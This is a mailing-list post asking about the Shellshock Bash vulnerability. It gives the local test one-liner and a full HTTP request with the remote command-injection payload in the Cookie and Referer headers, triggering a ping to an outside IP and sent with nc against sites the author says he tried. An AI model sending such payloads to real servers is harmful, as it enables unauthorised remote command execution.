Hi everyone,

Happy new year! To make it even merrier, it seems like a rather widespread vulnerability, based upon a bug in Bash (!) has been discovered:

http://www.engadget.com/2014/09/25/what-is-the-shellshock/

Or for short, type this on your bash console and see if you're cooked:

env x='() { :;}; echo vulnerable' bash -c 'echo This is a test'

If it says "vulnerable" before "This is a test", welcome to the club. Odds are it will.

So the idea is that you can execute an arbitrary command on a remote computer, if you can add an environment variable, and kick off a bash shell with it.

Word has it, that since the HTTP headers are passed to any CGI script as environment variables (by Apache, for example), it's possible to use the Referer or Cookie headers for this purpose.

So I tried this on a couple of sites (addresses mangled):

GET / HTTP/1.1
Host: thesite.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: () { :; }; ping -c 3 93.1.9.2
Referer: () { :; }; ping -c 3 93.1.9.2

and then went

nc thesite.com 80 < therequest.txt

This was supposed to trigger a ping in my direction, but it didn't. Instead, I found the full Referer string in the access log. Apparently, it didn't work on my first go.

Insights, anyone? Does it mean that the tested site is safe, despite the horror stories?

Regards,
   Eli

--
Web: http://www.billauer.co.il

_______________________________________________
Haifux mailing list
Haifux@haifux.org
http://haifux.org/mailman/listinfo/haifux

Reply via email to